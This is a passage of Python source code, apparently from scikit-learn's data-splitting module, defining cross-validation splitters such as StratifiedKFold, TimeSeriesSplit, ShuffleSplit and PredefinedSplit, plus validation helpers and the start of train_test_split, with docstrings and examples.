cls]\n # the test split can be too big because we used\n # KFold(...).split(X[:max(c, n_splits)]) when data is not 100%\n # stratifiable for all the classes\n # (we use a warning instead of raising an exception)\n # If this is the case, let's trim it:\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[y == cls] = cls_test_folds\n\n return test_folds\n\n def _iter_test_masks(self, X, y=None, groups=None):\n test_folds = self._make_test_folds(X, y)\n for i in range(self.n_splits):\n yield test_folds == i\n\n def split(self, X, y, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Note that providing ``y`` is sufficient to generate the splits and\n hence ``np.zeros(n_samples)`` may be used as a placeholder for\n ``X`` instead of actual training data.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n Stratification is done based on the y labels.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n y = check_array(y, ensure_2d=False, dtype=None)\n return super(StratifiedKFold, self).split(X, y, groups)\n\n\nclass TimeSeriesSplit(_BaseKFold):\n \"\"\"Time Series cross-validator\n\n Provides train/test indices to split time series data samples\n that are observed at fixed time intervals, in train/test sets.\n In each split, test indices must be higher than before, and thus shuffling\n in cross validator is inappropriate.\n\n This cross-validation object is a variation of :class:`KFold`.\n In the kth split, it returns first k folds as train set and the\n (k+1)th fold as test set.\n\n Note that unlike standard cross-validation methods, successive\n training sets are supersets of those that come before them.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of splits. Must be at least 1.\n\n Examples\n --------\n >>> from sklearn.model_selection import TimeSeriesSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([1, 2, 3, 4])\n >>> tscv = TimeSeriesSplit(n_splits=3)\n >>> print(tscv) # doctest: +NORMALIZE_WHITESPACE\n TimeSeriesSplit(n_splits=3)\n >>> for train_index, test_index in tscv.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [0] TEST: [1]\n TRAIN: [0 1] TEST: [2]\n TRAIN: [0 1 2] TEST: [3]\n\n Notes\n -----\n The training set has size ``i * n_samples // (n_splits + 1)\n + n_samples % (n_splits + 1)`` in the ``i``th split,\n with a test set of size ``n_samples//(n_splits + 1)``,\n where ``n_samples`` is the number of samples.\n \"\"\"\n def __init__(self, n_splits=3):\n super(TimeSeriesSplit, self).__init__(n_splits,\n shuffle=False,\n random_state=None)\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n Always ignored, exists for compatibility.\n\n groups : array-like, with shape (n_samples,), optional\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n n_samples = _num_samples(X)\n n_splits = self.n_splits\n n_folds = n_splits + 1\n if n_folds > n_samples:\n raise ValueError(\n (\"Cannot have number of folds ={0} greater\"\n \" than the number of samples: {1}.\").format(n_folds,\n n_samples))\n indices = np.arange(n_samples)\n test_size = (n_samples // n_folds)\n test_starts = range(test_size + n_samples % n_folds,\n n_samples, test_size)\n for test_start in test_starts:\n yield (indices[:test_start],\n indices[test_start:test_start + test_size])\n\n\nclass LeaveOneGroupOut(BaseCrossValidator):\n \"\"\"Leave One Group Out cross-validator\n\n Provides train/test indices to split data according to a third-party\n provided group. This group information can be used to encode arbitrary\n domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeaveOneGroupOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 1, 2])\n >>> groups = np.array([1, 1, 2, 2])\n >>> logo = LeaveOneGroupOut()\n >>> logo.get_n_splits(X, y, groups)\n 2\n >>> print(logo)\n LeaveOneGroupOut()\n >>> for train_index, test_index in logo.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n TRAIN: [2 3] TEST: [0 1]\n [[5 6]\n [7 8]] [[1 2]\n [3 4]] [1 2] [1 2]\n TRAIN: [0 1] TEST: [2 3]\n [[1 2]\n [3 4]] [[5 6]\n [7 8]] [1 2] [1 2]\n\n \"\"\"\n\n def _iter_test_masks(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n # We make a copy of groups to avoid side-effects during iteration\n groups = check_array(groups, copy=True, ensure_2d=False, dtype=None)\n unique_groups = np.unique(groups)\n if len(unique_groups) <= 1:\n raise ValueError(\n \"The groups parameter contains fewer than 2 unique groups \"\n \"(%s). LeaveOneGroupOut expects at least 2.\" % unique_groups)\n for i in unique_groups:\n yield groups == i\n\n def get_n_splits(self, X, y, groups):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n return len(np.unique(groups))\n\n\nclass LeavePGroupsOut(BaseCrossValidator):\n \"\"\"Leave P Group(s) Out cross-validator\n\n Provides train/test indices to split data according to a third-party\n provided group. This group information can be used to encode arbitrary\n domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n The difference between LeavePGroupsOut and LeaveOneGroupOut is that\n the former builds the test sets with all the samples assigned to\n ``p`` different values of the groups while the latter uses samples\n all assigned the same groups.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_groups : int\n Number of groups (``p``) to leave out in the test split.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeavePGroupsOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6]])\n >>> y = np.array([1, 2, 1])\n >>> groups = np.array([1, 2, 3])\n >>> lpgo = LeavePGroupsOut(n_groups=2)\n >>> lpgo.get_n_splits(X, y, groups)\n 3\n >>> print(lpgo)\n LeavePGroupsOut(n_groups=2)\n >>> for train_index, test_index in lpgo.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n TRAIN: [2] TEST: [0 1]\n [[5 6]] [[1 2]\n [3 4]] [1] [1 2]\n TRAIN: [1] TEST: [0 2]\n [[3 4]] [[1 2]\n [5 6]] [2] [1 1]\n TRAIN: [0] TEST: [1 2]\n [[1 2]] [[3 4]\n [5 6]] [1] [2 1]\n\n See also\n --------\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def __init__(self, n_groups):\n self.n_groups = n_groups\n\n def _iter_test_masks(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, copy=True, ensure_2d=False, dtype=None)\n unique_groups = np.unique(groups)\n if self.n_groups >= len(unique_groups):\n raise ValueError(\n \"The groups parameter contains fewer than (or equal to) \"\n \"n_groups (%d) numbers of unique groups (%s). LeavePGroupsOut \"\n \"expects that at least n_groups + 1 (%d) unique groups be \"\n \"present\" % (self.n_groups, unique_groups, self.n_groups + 1))\n combi = combinations(range(len(unique_groups)), self.n_groups)\n for indices in combi:\n test_index = np.zeros(_num_samples(X), dtype=np.bool)\n for l in unique_groups[np.array(indices)]:\n test_index[groups == l] = True\n yield test_index\n\n def get_n_splits(self, X, y, groups):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n ``np.zeros(n_samples)`` may be used as a placeholder.\n\n y : object\n Always ignored, exists for compatibility.\n ``np.zeros(n_samples)`` may be used as a placeholder.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n X, y, groups = indexable(X, y, groups)\n return int(comb(len(np.unique(groups)), self.n_groups, exact=True))\n\n\nclass BaseShuffleSplit(with_metaclass(ABCMeta)):\n \"\"\"Base class for ShuffleSplit and StratifiedShuffleSplit\"\"\"\n\n def __init__(self, n_splits=10, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n for train, test in self._iter_indices(X, y, groups):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, X, y=None, groups=None):\n \"\"\"Generate (train, test) indices\"\"\"\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass ShuffleSplit(BaseShuffleSplit):\n \"\"\"Random permutation cross-validator\n\n Yields indices to split data into training and test sets.\n\n Note: contrary to other cross-validation strategies, random splits\n do not guarantee that all folds will be different, although this is\n still very likely for sizeable datasets.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int (default 10)\n Number of re-shuffling & splitting iterations.\n\n test_size : float, int, or None, default 0.1\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n Examples\n --------\n >>> from sklearn.model_selection import ShuffleSplit\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 1, 2])\n >>> rs = ShuffleSplit(n_splits=3, test_size=.25, random_state=0)\n >>> rs.get_n_splits(X)\n 3\n >>> print(rs)\n ShuffleSplit(n_splits=3, random_state=0, test_size=0.25, train_size=None)\n >>> for train_index, test_index in rs.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... # doctest: +ELLIPSIS\n TRAIN: [3 1 0] TEST: [2]\n TRAIN: [2 1 3] TEST: [0]\n TRAIN: [0 2 1] TEST: [3]\n >>> rs = ShuffleSplit(n_splits=3, train_size=0.5, test_size=.25,\n ... random_state=0)\n >>> for train_index, test_index in rs.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... # doctest: +ELLIPSIS\n TRAIN: [3 1] TEST: [2]\n TRAIN: [2 1] TEST: [0]\n TRAIN: [0 2] TEST: [3]\n \"\"\"\n\n def _iter_indices(self, X, y=None, groups=None):\n n_samples = _num_samples(X)\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n # random partition\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n yield ind_train, ind_test\n\n\nclass GroupShuffleSplit(ShuffleSplit):\n '''Shuffle-Group(s)-Out cross-validation iterator\n\n Provides randomized train/test indices to split data according to a\n third-party provided group. This group information can be used to encode\n arbitrary domain specific stratifications of the samples as integers.\n\n For instance the groups could be the year of collection of the samples\n and thus allow for cross-validation against time-based splits.\n\n The difference between LeavePGroupsOut and GroupShuffleSplit is that\n the former generates splits using all subsets of size ``p`` unique groups,\n whereas GroupShuffleSplit generates a user-determined number of random\n test splits, each with a user-determined fraction of unique groups.\n\n For example, a less computationally intensive alternative to\n ``LeavePGroupsOut(p=10)`` would be\n ``GroupShuffleSplit(test_size=10, n_splits=100)``.\n\n Note: The parameters ``test_size`` and ``train_size`` refer to groups, and\n not to samples, as in ShuffleSplit.\n\n\n Parameters\n ----------\n n_splits : int (default 5)\n Number of re-shuffling & splitting iterations.\n\n test_size : float (default 0.2), int, or None\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the groups to include in the test split. If\n int, represents the absolute number of test groups. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the groups to include in the train split. If\n int, represents the absolute number of train groups. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n '''\n\n def __init__(self, n_splits=5, test_size=0.2, train_size=None,\n random_state=None):\n super(GroupShuffleSplit, self).__init__(\n n_splits=n_splits,\n test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n def _iter_indices(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n classes, group_indices = np.unique(groups, return_inverse=True)\n for group_train, group_test in super(\n GroupShuffleSplit, self)._iter_indices(X=classes):\n # these are the indices of classes in the partition\n # invert them into data indices\n\n train = np.flatnonzero(np.in1d(group_indices, group_train))\n test = np.flatnonzero(np.in1d(group_indices, group_test))\n\n yield train, test\n\n\ndef _approximate_mode(class_counts, n_draws, rng):\n \"\"\"Computes approximate mode of multivariate hypergeometric.\n\n This is an approximation to the mode of the multivariate\n hypergeometric given by class_counts and n_draws.\n It shouldn't be off by more than one.\n\n It is the mostly likely outcome of drawing n_draws many\n samples from the population given by class_counts.\n\n Parameters\n ----------\n class_counts : ndarray of int\n Population per class.\n n_draws : int\n Number of draws (samples to draw) from the overall population.\n rng : random state\n Used to break ties.\n\n Returns\n -------\n sampled_classes : ndarray of int\n Number of samples drawn from each class.\n np.sum(sampled_classes) == n_draws\n\n Examples\n --------\n >>> from sklearn.model_selection._split import _approximate_mode\n >>> _approximate_mode(class_counts=np.array([4, 2]), n_draws=3, rng=0)\n array([2, 1])\n >>> _approximate_mode(class_counts=np.array([5, 2]), n_draws=4, rng=0)\n array([3, 1])\n >>> _approximate_mode(class_counts=np.array([2, 2, 2, 1]),\n ... n_draws=2, rng=0)\n array([0, 1, 1, 0])\n >>> _approximate_mode(class_counts=np.array([2, 2, 2, 1]),\n ... n_draws=2, rng=42)\n array([1, 1, 0, 0])\n \"\"\"\n # this computes a bad approximation to the mode of the\n # multivariate hypergeometric given by class_counts and n_draws\n continuous = n_draws * class_counts / class_counts.sum()\n # floored means we don't overshoot n_samples, but probably undershoot\n floored = np.floor(continuous)\n # we add samples according to how much \"left over\" probability\n # they had, until we arrive at n_samples\n need_to_add = int(n_draws - floored.sum())\n if need_to_add > 0:\n remainder = continuous - floored\n values = np.sort(np.unique(remainder))[::-1]\n # add according to remainder, but break ties\n # randomly to avoid biases\n for value in values:\n inds, = np.where(remainder == value)\n # if we need_to_add less than what's in inds\n # we draw randomly from them.\n # if we need to add more, we add them all and\n # go to the next value\n add_now = min(len(inds), need_to_add)\n inds = choice(inds, size=add_now, replace=False, random_state=rng)\n floored[inds] += 1\n need_to_add -= add_now\n if need_to_add == 0:\n break\n return floored.astype(np.int)\n\n\nclass StratifiedShuffleSplit(BaseShuffleSplit):\n \"\"\"Stratified ShuffleSplit cross-validator\n\n Provides train/test indices to split data in train/test sets.\n\n This cross-validation object is a merge of StratifiedKFold and\n ShuffleSplit, which returns stratified randomized folds. The folds\n are made by preserving the percentage of samples for each class.\n\n Note: like the ShuffleSplit strategy, stratified random splits\n do not guarantee that all folds will be different, although this is\n still very likely for sizeable datasets.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int (default 10)\n Number of re-shuffling & splitting iterations.\n\n test_size : float (default 0.1), int, or None\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n Examples\n --------\n >>> from sklearn.model_selection import StratifiedShuffleSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> sss = StratifiedShuffleSplit(n_splits=3, test_size=0.5, random_state=0)\n >>> sss.get_n_splits(X, y)\n 3\n >>> print(sss) # doctest: +ELLIPSIS\n StratifiedShuffleSplit(n_splits=3, random_state=0, ...)\n >>> for train_index, test_index in sss.split(X, y):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 2] TEST: [3 0]\n TRAIN: [0 2] TEST: [1 3]\n TRAIN: [0 2] TEST: [3 1]\n \"\"\"\n\n def __init__(self, n_splits=10, test_size=0.1, train_size=None,\n random_state=None):\n super(StratifiedShuffleSplit, self).__init__(\n n_splits, test_size, train_size, random_state)\n\n def _iter_indices(self, X, y, groups=None):\n n_samples = _num_samples(X)\n y = check_array(y, ensure_2d=False, dtype=None)\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n classes, y_indices = np.unique(y, return_inverse=True)\n n_classes = classes.shape[0]\n\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\"The least populated class in y has only 1\"\n \" member, which is too few. The minimum\"\n \" number of groups for any class cannot\"\n \" be less than 2.\")\n\n if n_train < n_classes:\n raise ValueError('The train_size = %d should be greater or '\n 'equal to the number of classes = %d' %\n (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError('The test_size = %d should be greater or '\n 'equal to the number of classes = %d' %\n (n_test, n_classes))\n\n rng = check_random_state(self.random_state)\n\n for _ in range(self.n_splits):\n # if there are ties in the class-counts, we want\n # to make sure to break them anew in each iteration\n n_i = _approximate_mode(class_counts, n_train, rng)\n class_counts_remaining = class_counts - n_i\n t_i = _approximate_mode(class_counts_remaining, n_test, rng)\n\n train = []\n test = []\n\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where((y == class_i))[0][permutation]\n\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n train = rng.permutation(train)\n test = rng.permutation(test)\n\n yield train, test\n\n def split(self, X, y, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Note that providing ``y`` is sufficient to generate the splits and\n hence ``np.zeros(n_samples)`` may be used as a placeholder for\n ``X`` instead of actual training data.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n Stratification is done based on the y labels.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n y = check_array(y, ensure_2d=False, dtype=None)\n return super(StratifiedShuffleSplit, self).split(X, y, groups)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\n\n NOTE This does not take into account the number of samples which is known\n only at split\n \"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.:\n raise ValueError(\n 'test_size=%f should be smaller '\n 'than 1.0 or be an integer' % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n # int values are checked during split based on the input\n raise ValueError(\"Invalid value for test_size: %r\" % test_size)\n\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.:\n raise ValueError(\"train_size=%f should be smaller \"\n \"than 1.0 or be an integer\" % train_size)\n elif (np.asarray(test_size).dtype.kind == 'f' and\n (train_size + test_size) > 1.):\n raise ValueError('The sum of test_size and train_size = %f, '\n 'should be smaller than 1.0. Reduce '\n 'test_size and/or train_size.' %\n (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n # int values are checked during split based on the input\n raise ValueError(\"Invalid value for train_size: %r\" % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n \"\"\"\n Validation helper to check if the test/test sizes are meaningful wrt to the\n size of the data (n_samples)\n \"\"\"\n if (test_size is not None and np.asarray(test_size).dtype.kind == 'i' and\n test_size >= n_samples):\n raise ValueError('test_size=%d should be smaller than the number of '\n 'samples %d' % (test_size, n_samples))\n\n if (train_size is not None and np.asarray(train_size).dtype.kind == 'i' and\n train_size >= n_samples):\n raise ValueError(\"train_size=%d should be smaller than the number of\"\n \" samples %d\" % (train_size, n_samples))\n\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n\n if test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError('The sum of train_size and test_size = %d, '\n 'should be smaller than the number of '\n 'samples %d. Reduce test_size and/or '\n 'train_size.' % (n_train + n_test, n_samples))\n\n return int(n_train), int(n_test)\n\n\nclass PredefinedSplit(BaseCrossValidator):\n \"\"\"Predefined split cross-validator\n\n Splits the data into training/test set folds according to a predefined\n scheme. Each sample can be assigned to at most one test set fold, as\n specified by the user through the ``test_fold`` parameter.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import PredefinedSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> test_fold = [0, 1, -1, 1]\n >>> ps = PredefinedSplit(test_fold)\n >>> ps.get_n_splits()\n 2\n >>> print(ps) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS\n PredefinedSplit(test_fold=array([ 0, 1, -1, 1]))\n >>> for train_index, test_index in ps.split():\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 2 3] TEST: [0]\n TRAIN: [0 2] TEST: [1 3]\n \"\"\"\n\n def __init__(self, test_fold):\n self.test_fold = np.array(test_fold, dtype=np.int)\n self.test_fold = column_or_1d(self.test_fold)\n self.unique_folds = np.unique(self.test_fold)\n self.unique_folds = self.unique_folds[self.unique_folds != -1]\n\n def split(self, X=None, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n ind = np.arange(len(self.test_fold))\n for test_index in self._iter_test_masks():\n train_index = ind[np.logical_not(test_index)]\n test_index = ind[test_index]\n yield train_index, test_index\n\n def _iter_test_masks(self):\n \"\"\"Generates boolean masks corresponding to test sets.\"\"\"\n for f in self.unique_folds:\n test_index = np.where(self.test_fold == f)[0]\n test_mask = np.zeros(len(self.test_fold), dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return len(self.unique_folds)\n\n\nclass _CVIterableWrapper(BaseCrossValidator):\n \"\"\"Wrapper class for old style cv objects and iterables.\"\"\"\n def __init__(self, cv):\n self.cv = list(cv)\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return len(self.cv)\n\n def split(self, X=None, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n for train, test in self.cv:\n yield train, test\n\n\ndef check_cv(cv=3, y=None, classifier=False):\n \"\"\"Input checker utility for building a cross-validator\n\n Parameters\n ----------\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - An object to be used as a cross-validation generator.\n - An iterable yielding train/test splits.\n\n For integer/None inputs, if classifier is True and ``y`` is either\n binary or multiclass, :class:`StratifiedKFold` is used. In all other\n cases, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validation strategies that can be used here.\n\n y : array-like, optional\n The target variable for supervised learning problems.\n\n classifier : boolean, optional, default False\n Whether the task is a classification task, in which case\n stratified KFold will be used.\n\n Returns\n -------\n checked_cv : a cross-validator instance.\n The return value is a cross-validator which generates the train/test\n splits via the ``split`` method.\n \"\"\"\n if cv is None:\n cv = 3\n\n if isinstance(cv, numbers.Integral):\n if (classifier and (y is not None) and\n (type_of_target(y) in ('binary', 'multiclass'))):\n return StratifiedKFold(cv)\n else:\n return KFold(cv)\n\n if not hasattr(cv, 'split') or isinstance(cv, str):\n if not isinstance(cv, Iterable) or isinstance(cv, str):\n raise ValueError(\"Expected cv as an integer, cross-validation \"\n \"object (from sklearn.model_selection) \"\n \"or an iterable. Got %s.\" % cv)\n return _CVIterableWrapper(cv)\n\n return cv # New style cv objects are passed without any modification\n\n\ndef train_test_split(*arrays, **options):\n \"\"\"Split arrays or matrices into random train and test subsets\n\n Quick utility that wraps input validation and\n ``next(ShuffleSplit().split(X, y))`` and application to input data\n into a single call for splitting (and optionally subsampling) data in a\n oneliner.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n *arrays : sequence of indexables with same length / shape[0]\n Allowed inputs are lists, numpy arrays, scipy-sparse\n matrices or pandas dataframes.\n\n test_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25.\n\n train_size : float, int, or None (default is None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : array-like or None (default is None)\n If not None, data is split in a stratified fashion, using this as\n the class labels.\n\n Returns\n -------\n splitting : list, length=2 * len(arrays)\n List containing train-test split of inputs.\n\n .. versionadded:: 0.16\n If the input is sparse, the output will be a\n ``scipy.sparse.csr_matrix``. Else, output type is the same as the\n input type.\n\n Examples\n --------\n >>> import numpy as np\n >>> from sklearn.model_selection import train_test_split\n >>> X, y = np.arange(10).reshape((5, 2)), range(5)\n >>> X\n array([[0, 1],\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9]])\n >>> list(y)\n [0, 1, 2, 3, 4]\n\n >>> X_train, X_test, y_train, y_test = train_test_split(\n ... X, y, test_size=0.33, random_state=42)\n ...\n >>> X_train\n array([[4, 5],\n [0, 1],\n [6, 7]])\n >>> y_train\n [2, 0, 3]\n >>> X_test\n array([[2, 3],\n [8, 9]])\n >>> y_test\n [1, 4]\n\n \"\"\"\n n_arrays = len(arrays)\n if n_arrays == 0:\n raise ValueError(\"At least one array required as input\")\n test_size = options.pop('test_size', None)\n train_size = options.pop('train_size', 